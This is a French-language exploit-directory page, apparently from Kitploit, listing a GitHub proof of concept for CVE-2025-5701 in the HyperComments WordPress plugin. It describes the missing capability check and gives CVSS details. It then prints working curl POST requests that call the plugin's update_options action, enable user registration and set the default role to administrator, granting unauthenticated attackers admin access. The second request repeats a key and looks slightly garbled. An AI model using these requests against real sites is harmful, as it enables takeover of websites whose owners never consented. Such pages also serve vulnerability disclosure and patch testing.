Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-5701 — HyperComments <= 1.2.2 - Non authentifié (Abonné+) Mise à jour arbitraire des options | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2025-5701
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionMauvaise Configuration
GitHubrandomrobbiebf/cve-2025-5701

CVE-2025-5701

HyperComments <= 1.2.2 - Non authentifié (Abonné+) Mise à jour arbitraire des options

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-5701

HyperComments <= 1.2.2 - Mise à jour non authentifiée (Abonné+) d'options arbitraires

Description

Le plugin HyperComments pour WordPress est vulnérable à une modification non autorisée de données pouvant entraîner une escalade de privilèges en raison d'un manque de vérification des capacités sur la fonction hc_request_handler dans toutes les versions jusqu'à la version 1.2.2 incluse. Cela permet à des attaquants non authentifiés de mettre à jour des options arbitraires sur le site WordPress. Cela peut être exploité pour modifier le rôle par défaut pour l'inscription en administrateur et activer l'inscription des utilisateurs afin que les attaquants puissent obtenir un accès administratif à un site vulnérable.

Détails

  • Type : plugin
  • Slug : hypercomments
  • Version affectée : 1.2.2
  • Score CVSS : 9.8
  • Évaluation CVSS : Critique
  • Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE : CVE-2025-5701
  • Statut : Fermé

POC

root@kitploit:~
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
  -d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
  -H "Content-Type: application/x-www-form-urlencoded"
root@kitploit:~
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
  -d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
  -H "Content-Type: application/x-www-form-urlencoded"
Télécharger l’outil